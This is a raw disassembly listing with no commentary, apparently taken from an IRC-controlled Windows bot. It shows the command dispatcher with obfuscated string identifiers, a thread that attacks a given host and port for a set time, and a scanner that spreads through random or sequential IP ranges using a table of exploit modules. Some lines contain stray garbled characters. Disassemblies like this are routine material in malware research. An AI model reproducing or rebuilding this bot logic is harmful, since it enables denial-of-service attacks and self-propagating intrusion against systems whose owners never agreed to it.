; sub_40A938+91AF�j
cmp byte ptr [eax], 5Eh
jnz short loc_413AFE
cmp [ebp+edi+var_C131], 20h
jnz short loc_413AFE
mov byte ptr [eax], 2Bh
loc_413AFE: ; CODE XREF: sub_40A938+91B7�j
; sub_40A938+91C1�j
cmp byte ptr [eax], 60h
jnz short loc_413B10
cmp [ebp+edi+var_C131], 20h
jnz short loc_413B10
mov byte ptr [eax], 5Eh
loc_413B10: ; CODE XREF: sub_40A938+91C9�j
; sub_40A938+91D3�j
lea eax, [ebp+var_C130]
inc edi
push eax
call sub_4292D0
cmp edi, eax
pop ecx
jb short loc_413AC1
loc_413B22: ; CODE XREF: sub_40A938+9187�j
xor ebx, ebx
mov edi, offset aSShouldRunS_ ; "%s Should run: \"%s\"."
cmp [ebp+arg_20], ebx
jz short loc_413B4E
cmp [ebp+arg_18], ebx
jnz short loc_413B53
lea eax, [ebp+var_C130]
push eax
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_413B4E: ; CODE XREF: sub_40A938+91F4�j
cmp [ebp+arg_18], ebx
jz short loc_413B6D
loc_413B53: ; CODE XREF: sub_40A938+91F9�j
lea eax, [ebp+var_C130]
push eax
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 14h
loc_413B6D: ; CODE XREF: sub_40A938+9219�j
push ebx
lea eax, [ebp+var_C130]
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push eax
call sub_40A86F
jmp loc_4146D5
; ---------------------------------------------------------------------------
loc_413B86: ; CODE XREF: sub_40A938+9076�j
xor eax, eax
mov edi, offset aPtami1_agv ; "PTaMI1/.aGV/"
cmp [ebp+arg_14], eax
mov ebx, offset aSFailedToParse ; "%s Failed to parse command."
jnz loc_40D1F7
cmp [ebp+arg_18], eax
jnz loc_40D201
cmp [ebp+arg_20], eax
jz loc_4148CF
jmp loc_40D1E7
; ---------------------------------------------------------------------------
loc_413BB2: ; CODE XREF: sub_40A938+85FB�j
; sub_40A938+8604�j
mov edi, offset aPtami1_agv ; "PTaMI1/.aGV/"
jmp loc_414695
; ---------------------------------------------------------------------------
loc_413BBC: ; CODE XREF: sub_40A938+6BC2�j
; sub_40A938+6BD3�j ...
xor eax, eax
cmp [ebx+4], eax
jz loc_413DD2
cmp [ebx+8], eax
jz loc_413DD2
cmp [ebx+0Ch], eax
jz loc_413DD2
cmp [ebx+10h], eax
jz loc_413DD2
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_413C36
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_413C1E
cmp [ebp+arg_18], 0
jnz short loc_413C28
push eax
push ebx
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_413C1E: ; CODE XREF: sub_40A938+92C8�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_413C28: ; CODE XREF: sub_40A938+92CE�j
push [ebp+arg_C]
push ebx
loc_413C2C: ; CODE XREF: sub_40A938+9482�j
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_413C36: ; CODE XREF: sub_40A938+92B8�j
mov eax, [ebp+arg_14]
mov [ebp+var_1D80], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1D84], eax
test eax, eax
lea eax, [ebp+var_1E18]
jnz short loc_413C57
push dword ptr [esi+0Ch]
jmp short loc_413C59
; ---------------------------------------------------------------------------
loc_413C57: ; CODE XREF: sub_40A938+9318�j
push dword ptr [esi]
loc_413C59: ; CODE XREF: sub_40A938+931D�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1F1C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1F18]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1D94], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_1D90], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp eax, 1
mov [ebp+var_1D8C], eax
jge short loc_413CBB
mov edi, offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
loc_413CB1: ; CODE XREF: sub_40A938+6F4A�j
; sub_40A938+7476�j ...
mov ebx, offset aSNoDelay_ ; "%s No delay."
jmp loc_40D1DB
; ---------------------------------------------------------------------------
loc_413CBB: ; CODE XREF: sub_40A938+9372�j
push 7Fh
lea eax, [ebp+var_1E98]
push dword ptr [ebx]
push eax
call sub_429C40
xor eax, eax
cmp [ebp+arg_60], eax
setnz al
mov [ebp+var_1D88], eax
push dword ptr [ebx+0Ch]
call sub_42A030
add esp, 10h
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push offset aSSDForDSecs__0 ; "%s --> (%s:%d) for %d secs."
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1D98], eax
push dword ptr [ebx]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
call edi ; dword_437174
test eax, eax
jz short loc_413D44
push dword ptr [ebx]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
call edi ; dword_437174
test eax, eax
jz short loc_413D44
push dword ptr [ebx]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
call edi ; dword_437174
test eax, eax
jz short loc_413D44
push dword ptr [ebx]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
call edi ; dword_437174
test eax, eax
jnz loc_4148CF
loc_413D44: ; CODE XREF: sub_40A938+93DF�j
; sub_40A938+93EC�j ...
lea eax, [ebp+arg_0]
xor ebx, ebx
push eax
lea eax, [ebp+var_1F1C]
push ebx
push eax
push offset sub_422D47
push ebx
push ebx
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1D98]
mov edi, offset aSSD_ ; "%s %s (%d)."
imul ecx, 2724h
cmp eax, ebx
mov ebx, dword_43716C
mov dword_46D70C[ecx], eax
jnz short loc_413DC7
cmp [ebp+arg_14], 0
jnz short loc_413DA8
cmp [ebp+arg_18], 0
jnz short loc_413DB2
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_413DA8: ; CODE XREF: sub_40A938+944C�j
; sub_40A938+9498�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_413DB2: ; CODE XREF: sub_40A938+9452�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_413C2C
; ---------------------------------------------------------------------------
loc_413DBF: ; CODE XREF: sub_40A938+9496�j
push 32h
call dword_43718C ; Sleep
loc_413DC7: ; CODE XREF: sub_40A938+9446�j
cmp [ebp+var_1D7C], 0
jz short loc_413DBF
jmp short loc_413DA8
; ---------------------------------------------------------------------------
loc_413DD2: ; CODE XREF: sub_40A938+9289�j
; sub_40A938+9292�j ...
mov edi, offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
jmp loc_414695
; ---------------------------------------------------------------------------
loc_413DDC: ; CODE XREF: sub_40A938+6435�j
; sub_40A938+6446�j ...
xor eax, eax
cmp [ebx+4], eax
jz loc_414690
cmp [ebx+8], eax
jz loc_414690
cmp [ebx+0Ch], eax
jz loc_414690
push 8
call sub_423737
push dword ptr [ebx+4]
mov [ebp+arg_C], eax
call sub_42A030
add eax, [ebp+arg_C]
pop ecx
pop ecx
cmp eax, 1C2h
jle short loc_413E5A
loc_413E17: ; CODE XREF: sub_40A938+5EAE�j
xor ebx, ebx
mov edi, offset aSSD_ ; "%s %s (%d)."
cmp [ebp+arg_14], ebx
jnz short loc_413E44
cmp [ebp+arg_18], ebx
jnz short loc_413E4D
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_413E44: ; CODE XREF: sub_40A938+94E9�j
cmp [ebp+arg_18], ebx
jz loc_4148CF
loc_413E4D: ; CODE XREF: sub_40A938+94EE�j
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
jmp loc_410C8D
; ---------------------------------------------------------------------------
loc_413E5A: ; CODE XREF: sub_40A938+94DD�j
push dword ptr [ebx]
xor eax, eax
mov [ebp+var_4], eax
mov [ebp+var_1C], eax
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
mov [ebp+var_28], eax
mov dword ptr [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov dword ptr [ebp+var_C+4], eax
call edi ; dword_437174
test eax, eax
jnz short loc_413E90
mov eax, dword_43A8C8
mov [ebp+var_4], 1
mov [ebp+arg_8], eax
loc_413E90: ; CODE XREF: sub_40A938+9547�j
push dword ptr [ebx]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call edi ; dword_437174
test eax, eax
jnz short loc_413EAC
mov eax, dword_43A8CC
mov [ebp+var_1C], 1
mov [ebp+arg_8], eax
loc_413EAC: ; CODE XREF: sub_40A938+9563�j
push dword ptr [ebx]
push offset a8im6i__c829_ ; "8Im6i..C829."
call edi ; dword_437174
test eax, eax
jnz short loc_413EC8
mov eax, dword_43A8D0
mov [ebp+var_28], 1
mov [ebp+arg_8], eax
loc_413EC8: ; CODE XREF: sub_40A938+957F�j
push dword ptr [ebx]
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
call edi ; dword_437174
test eax, eax
jnz short loc_413EE4
mov eax, dword_43A8D4
mov dword ptr [ebp+var_14], 1
mov [ebp+arg_8], eax
loc_413EE4: ; CODE XREF: sub_40A938+959B�j
push dword ptr [ebx]
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
call edi ; dword_437174
test eax, eax
jnz short loc_413F00
mov eax, dword_43A8D8
mov [ebp+var_24], 1
mov [ebp+arg_8], eax
loc_413F00: ; CODE XREF: sub_40A938+95B7�j
push dword ptr [ebx]
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
call edi ; dword_437174
test eax, eax
jnz short loc_413F1C
mov eax, dword_43A8DC
mov [ebp+var_18], 1
mov [ebp+arg_8], eax
loc_413F1C: ; CODE XREF: sub_40A938+95D3�j
push dword ptr [ebx]
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
call edi ; dword_437174
test eax, eax
jnz short loc_413F38
mov eax, dword_43A8E0
mov [ebp+var_20], 1
mov [ebp+arg_8], eax
loc_413F38: ; CODE XREF: sub_40A938+95EF�j
push dword ptr [ebx]
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
call edi ; dword_437174
test eax, eax
jnz short loc_413F54
mov eax, dword_43A8E4
mov dword ptr [ebp+var_C+4], 1
mov [ebp+arg_8], eax
loc_413F54: ; CODE XREF: sub_40A938+960B�j
push 8
call sub_423737
push dword ptr [ebx+4]
mov [ebp+arg_C], eax
call sub_42A030
add eax, [ebp+arg_C]
pop ecx
pop ecx
mov edi, offset aSSD_ ; "%s %s (%d)."
cmp eax, 1C2h
jle short loc_413FC0
cmp [ebp+arg_14], 0
jnz short loc_413F9F
cmp [ebp+arg_18], 0
jnz short loc_413FA5
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_413F9F: ; CODE XREF: sub_40A938+9643�j
cmp [ebp+arg_18], 0
jz short loc_413FC0
loc_413FA5: ; CODE XREF: sub_40A938+9649�j
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 18h
loc_413FC0: ; CODE XREF: sub_40A938+963D�j
; sub_40A938+966B�j
and [ebp+arg_68], 0
cmp [ebp+arg_8], 0
jle loc_4148CF
loc_413FCE: ; CODE XREF: sub_40A938+9C32�j
push dword ptr [ebx+4]
call sub_42A030
cdq
idiv [ebp+arg_8]
mov [ebp+var_BC], eax
push dword ptr [ebx+4]
call sub_42A030
cdq
idiv [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 64h
jle short loc_413FFD
mov [ebp+var_BC], 64h
loc_413FFD: ; CODE XREF: sub_40A938+96B9�j
push dword ptr [ebx+8]
call sub_42A030
cmp eax, 1
pop ecx
mov [ebp+var_D0], eax
jnb short loc_41401A
xor eax, eax
inc eax
mov [ebp+var_D0], eax
loc_41401A: ; CODE XREF: sub_40A938+96D7�j
push 3
pop ecx
cmp eax, ecx
jbe short loc_414027
mov [ebp+var_D0], ecx
loc_414027: ; CODE XREF: sub_40A938+96E7�j
push dword ptr [ebx+0Ch]
call sub_42A030
cmp eax, 270Fh
pop ecx
mov [ebp+var_CC], eax
jbe short loc_414047
mov [ebp+var_CC], 270Fh
loc_414047: ; CODE XREF: sub_40A938+9703�j
mov eax, [ebp+arg_14]
or [ebp+var_B8], 0FFFFFFFFh
and [ebp+arg_C], 0
cmp dword_43A378, 0
mov dword_454A28, eax
mov eax, [ebp+arg_20]
mov dword_454A2C, eax
mov eax, [ebp+arg_18]
mov dword_454A30, eax
jz loc_4141B6
mov [ebp+arg_4], offset aD1 ; "d1"
loc_41407E: ; CODE XREF: sub_40A938+985C�j
cmp [ebp+var_4], 0
jz short loc_4140A1
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A7C8
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz loc_41419C
loc_4140A1: ; CODE XREF: sub_40A938+974A�j
cmp [ebp+var_1C], 0
jz short loc_4140C4
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A7E8
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz loc_41419C
loc_4140C4: ; CODE XREF: sub_40A938+976D�j
cmp [ebp+var_28], 0
jz short loc_4140E7
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A808
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz loc_41419C
loc_4140E7: ; CODE XREF: sub_40A938+9790�j
cmp dword ptr [ebp+var_14], 0
jz short loc_41410A
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A828
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz loc_41419C
loc_41410A: ; CODE XREF: sub_40A938+97B3�j
cmp [ebp+var_24], 0
jz short loc_414129
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A848
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41419C
loc_414129: ; CODE XREF: sub_40A938+97D6�j
cmp [ebp+var_18], 0
jz short loc_414148
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A868
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41419C
loc_414148: ; CODE XREF: sub_40A938+97F5�j
cmp [ebp+var_20], 0
jz short loc_414167
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A888
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41419C
loc_414167: ; CODE XREF: sub_40A938+9814�j
cmp dword ptr [ebp+var_C+4], 0
jz short loc_414186
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A8A8
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41419C
loc_414186: ; CODE XREF: sub_40A938+9833�j
add [ebp+arg_4], 40h
inc [ebp+arg_C]
mov eax, [ebp+arg_4]
cmp dword ptr [eax+30h], 0
jnz loc_41407E
jmp short loc_4141B6
; ---------------------------------------------------------------------------
loc_41419C: ; CODE XREF: sub_40A938+9763�j
; sub_40A938+9786�j ...
mov eax, [ebp+arg_C]
mov ecx, eax
mov [ebp+var_B8], eax
shl ecx, 6
mov ecx, dword_43A378[ecx]
mov [ebp+var_D4], ecx
loc_4141B6: ; CODE XREF: sub_40A938+9739�j
; sub_40A938+9862�j
xor ecx, ecx
cmp [ebp+var_D4], ecx
jnz short loc_414208
cmp [ebp+arg_14], ecx
jnz short loc_4141E2
cmp [ebp+arg_18], ecx
jnz short loc_4141EC
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSInvalidPort_ ; "%s Invalid port."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_4141E2: ; CODE XREF: sub_40A938+988B�j
cmp [ebp+arg_18], 0
jz loc_414561
loc_4141EC: ; CODE XREF: sub_40A938+9890�j
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSPortInvalid_ ; "%s Port invalid."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 10h
jmp loc_414561
; ---------------------------------------------------------------------------
loc_414208: ; CODE XREF: sub_40A938+9886�j
mov eax, [ebx+10h]
cmp eax, ecx
jz loc_41429A
push eax
push offset aX_x_x_x ; "x.x.x.x"
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_41426B
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
loc_414230: ; CODE XREF: sub_40A938+990B�j
call sub_429ACC
cdq
mov ecx, 0DCh
idiv ecx
add edx, 4
cmp edx, 7Fh
jz short loc_414230
push edx
push offset aD_x_x_x ; "%d.x.x.x"
lea eax, [ebp+var_164]
push 10h
push eax
call sub_429AEE
add esp, 10h
loc_41425C: ; CODE XREF: sub_40A938+9ADD�j
; sub_40A938+9AE5�j ...
mov [ebp+var_A8], 1
jmp loc_41444E
; ---------------------------------------------------------------------------
loc_41426B: ; CODE XREF: sub_40A938+98E9�j
push dword ptr [ebx+10h]
lea eax, [ebp+var_164]
push 10h
push eax
call sub_429AEE
push 78h
push dword ptr [ebx+10h]
call sub_42B0D0
add esp, 14h
neg eax
sbb eax, eax
neg eax
loc_41428F: ; CODE XREF: sub_40A938+9A5B�j
mov [ebp+var_A8], eax
jmp loc_41444E
; ---------------------------------------------------------------------------
loc_41429A: ; CODE XREF: sub_40A938+98D5�j
cmp [ebp+arg_64], ecx
jnz short loc_4142EB
cmp [ebp+arg_54], ecx
jnz short loc_4142B7
cmp [ebp+arg_58], ecx
jnz short loc_4142B7
cmp [ebp+arg_5C], ecx
jnz short loc_4142B7
cmp [ebp+arg_60], ecx
jz loc_414644
loc_4142B7: ; CODE XREF: sub_40A938+996A�j
; sub_40A938+996F�j ...
mov ecx, [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_80]
push eax
mov [ebp+var_40], 10h
call sub_41DAA2
push eax
call dword_456E98 ; getsockname
cmp [ebp+arg_54], 0
jz loc_414398
and [ebp+var_7C], 0FFh
jmp loc_4143AF
; ---------------------------------------------------------------------------
loc_4142EB: ; CODE XREF: sub_40A938+9965�j
cmp [ebp+arg_54], ecx
jz short loc_4142F9
mov [ebp+arg_C], 1
jmp short loc_414317
; ---------------------------------------------------------------------------
loc_4142F9: ; CODE XREF: sub_40A938+99B6�j
cmp [ebp+arg_58], ecx
jz short loc_414307
mov [ebp+arg_C], 2
jmp short loc_414317
; ---------------------------------------------------------------------------
loc_414307: ; CODE XREF: sub_40A938+99C4�j
cmp [ebp+arg_5C], ecx
jz loc_41464B
mov [ebp+arg_C], 3
loc_414317: ; CODE XREF: sub_40A938+99BF�j
; sub_40A938+99CD�j
push offset byte_454A34
push offset dword_457C20
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41433A
push offset dword_457C20
call sub_41E3FB
test eax, eax
pop ecx
jz short loc_414363
loc_41433A: ; CODE XREF: sub_40A938+99F1�j
mov ecx, [ebp+arg_10]
call sub_41DA92
mov ecx, [ebp+arg_10]
push eax
call sub_41CE5F
push 2710h
push eax
mov [ebp+arg_4], eax
call dword_43707C ; WaitForSingleObject
push [ebp+arg_4]
call dword_437044 ; CloseHandle
loc_414363: ; CODE XREF: sub_40A938+9A00�j
push [ebp+arg_C]
push [ebp+arg_60]
push offset dword_457C20
call sub_401F44
add esp, 0Ch
test eax, eax
jz loc_4148CF
push 10h
push eax
lea eax, [ebp+var_164]
push eax
call sub_429C40
mov eax, [ebp+arg_60]
add esp, 0Ch
jmp loc_41428F
; ---------------------------------------------------------------------------
loc_414398: ; CODE XREF: sub_40A938+99A1�j
cmp [ebp+arg_58], 0
jz short loc_4143A5
and word ptr [ebp+var_7C+2], 0
jmp short loc_4143AF
; ---------------------------------------------------------------------------
loc_4143A5: ; CODE XREF: sub_40A938+9A64�j
cmp [ebp+arg_5C], 0
jz short loc_4143AF
and byte ptr [ebp+var_7C+3], 0
loc_4143AF: ; CODE XREF: sub_40A938+99AE�j
; sub_40A938+9A6B�j ...
push 10h
push [ebp+var_7C]
call dword_456FBC ; inet_ntoa
push eax
lea eax, [ebp+var_164]
push eax
call sub_429C40
add esp, 0Ch
cmp [ebp+arg_60], 0
jz short loc_414447
xor eax, eax
cmp [ebp+arg_54], eax
mov [ebp+arg_4], eax
jz short loc_4143E3
mov [ebp+arg_4], 3
jmp short loc_4143FD
; ---------------------------------------------------------------------------
loc_4143E3: ; CODE XREF: sub_40A938+9AA0�j
cmp [ebp+arg_58], eax
jz short loc_4143F1
mov [ebp+arg_4], 2
jmp short loc_4143FD
; ---------------------------------------------------------------------------
loc_4143F1: ; CODE XREF: sub_40A938+9AAE�j
cmp [ebp+arg_5C], eax
jz short loc_4143FD
mov [ebp+arg_4], 1
loc_4143FD: ; CODE XREF: sub_40A938+9AA9�j
; sub_40A938+9AB7�j ...
lea eax, [ebp+var_164]
push 30h
push eax
call sub_42AF90
and byte ptr [ebp+arg_C+3], 0
cmp [ebp+arg_4], 0
pop ecx
pop ecx
jle loc_41425C
loc_41441B: ; CODE XREF: sub_40A938+9B08�j
test eax, eax
jz loc_41425C
mov byte ptr [eax], 78h
lea eax, [ebp+var_164]
push 30h
push eax
call sub_42AF90
inc byte ptr [ebp+arg_C+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_C+3]
cmp ecx, [ebp+arg_4]
jl short loc_41441B
jmp loc_41425C
; ---------------------------------------------------------------------------
loc_414447: ; CODE XREF: sub_40A938+9A96�j
and [ebp+var_A8], 0
loc_41444E: ; CODE XREF: sub_40A938+992E�j
; sub_40A938+995D�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_10]
mov [ebp+var_B4], eax
mov eax, [ebp+arg_20]
mov [ebp+var_AC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_B0], eax
mov [ebp+var_9C], ecx
test eax, eax
lea eax, [ebp+var_154]
jz short loc_414483
push offset dword_443EF4
jmp short loc_414488
; ---------------------------------------------------------------------------
loc_414483: ; CODE XREF: sub_40A938+9B42�j
push offset dword_443EFC
loc_414488: ; CODE XREF: sub_40A938+9B49�j
push eax
call dword_4370A4 ; lstrcpyA
cmp [ebp+var_A8], 0
mov eax, offset aRandom ; "Random"
jnz short loc_4144A2
mov eax, offset aSequential ; "Sequential"
loc_4144A2: ; CODE XREF: sub_40A938+9B63�j
push [ebp+var_BC]
lea ecx, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSSSSDWithADe_0 ; "%s %s %s %s:%d with a delay of %d secon"...
push 8
call sub_4233DE
add esp, 28h
mov [ebp+var_C8], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_164]
push eax
xor eax, eax
push eax
push ecx
push offset sub_40242A
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_C8]
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_41457D
cmp [ebp+arg_14], eax
jnz short loc_41453C
cmp [ebp+arg_18], eax
jnz short loc_414542
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_41453C: ; CODE XREF: sub_40A938+9BDD�j
cmp [ebp+arg_18], 0
jz short loc_414561
loc_414542: ; CODE XREF: sub_40A938+9BE2�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 18h
loc_414561: ; CODE XREF: sub_40A938+98AE�j
; sub_40A938+98CB�j ...
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_8]
jl loc_413FCE
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_414575: ; CODE XREF: sub_40A938+9C4C�j
push 32h
call dword_43718C ; Sleep
loc_41457D: ; CODE XREF: sub_40A938+9BD8�j
cmp [ebp+var_A4], 0
jz short loc_414575
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_4145E6
cmp [ebp+arg_18], eax
jnz short loc_4145F0
cmp [ebp+arg_1C], eax
jnz short loc_414561
cmp [ebp+var_A8], eax
mov eax, offset aRandom ; "Random"
jnz short loc_4145A9
mov eax, offset aSequential ; "Sequential"
loc_4145A9: ; CODE XREF: sub_40A938+9C6A�j
push [ebp+var_BC]
lea ecx, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSSSSDWithADe_0 ; "%s %s %s %s:%d with a delay of %d secon"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 2Ch
loc_4145E6: ; CODE XREF: sub_40A938+9C53�j
cmp [ebp+arg_18], 0
jz loc_414561
loc_4145F0: ; CODE XREF: sub_40A938+9C58�j
cmp [ebp+var_A8], 0
mov eax, offset aRandom ; "Random"
jnz short loc_414603
mov eax, offset aSequential ; "Sequential"
loc_414603: ; CODE XREF: sub_40A938+9CC4�j
push [ebp+var_BC]
lea ecx, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSSSSDWithADe_0 ; "%s %s %s %s:%d with a delay of %d secon"...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 2Ch
jmp loc_414561
; ---------------------------------------------------------------------------
loc_414644: ; CODE XREF: sub_40A938+9979�j
mov edi, offset aSNoIpSpecified ; "%s No IP specified."
jmp short loc_414650
; ---------------------------------------------------------------------------
loc_41464B: ; CODE XREF: sub_40A938+99D2�j
mov edi, offset aSNoSubnetCla_0 ; "%s No subnet class specified"
loc_414650: ; CODE XREF: sub_40A938+9D11�j
cmp [ebp+arg_14], ecx
jnz short loc_41466E
cmp [ebp+arg_18], ecx
jnz short loc_414678
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_41466E: ; CODE XREF: sub_40A938+9D1B�j
cmp [ebp+arg_18], 0
loc_414672: ; CODE XREF: sub_40A938+5FC5�j
jz loc_4148CF
loc_414678: ; CODE XREF: sub_40A938+5FA6�j
; sub_40A938+9D20�j
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
loc_41467D: ; CODE XREF: sub_40A938+C69�j
; sub_40A938+4658�j
push edi
loc_41467E: ; CODE XREF: sub_40A938+2775�j
; sub_40A938+28CB�j ...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
loc_414688: ; CODE XREF: sub_40A938+55B�j
; sub_40A938+5E3F�j
add esp, 10h
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_414690: ; CODE XREF: sub_40A938+5E71�j
; sub_40A938+5E7A�j ...
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
loc_414695: ; CODE XREF: sub_40A938+927F�j
; sub_40A938+949F�j
